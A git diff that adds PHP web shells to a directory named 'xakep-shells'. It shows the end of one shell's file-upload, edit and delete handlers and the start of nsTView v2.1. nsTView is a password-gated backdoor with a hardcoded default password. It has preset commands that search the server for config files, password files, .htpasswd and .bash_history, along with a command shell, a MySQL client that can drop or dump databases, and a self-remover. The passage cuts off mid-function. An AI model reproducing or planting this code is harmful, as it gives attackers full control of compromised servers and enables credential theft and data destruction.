+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- Network security team :: nst.void.ru -->
\ No newline at end of file
diff --git a/xakep-shells/PHP/nstview.php.php.txt b/xakep-shells/PHP/nstview.php.php.txt
new file mode 100644
index 0000000..4ecf4bb
--- /dev/null
+++ b/xakep-shells/PHP/nstview.php.php.txt
@@ -0,0 +1,2136 @@
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+error_reporting(E_ALL & ~E_NOTICE);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.1";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView $ver:: nst.void.ru</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.sh311Form.sh3.value+=\" \"+ text;
+document.sh311Form.sh3.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
+if($os=="unix"){
+print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
+}
+print "</td></tr>";
+
+
+
+
+
+if($_GET['p']=="ftp"){
+print "<tr><td>";
+
+
+
+print "</td></tr></table>";
+print $copyr;
+exit;
+}
+
+
+
+
+
+
+
+
+
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
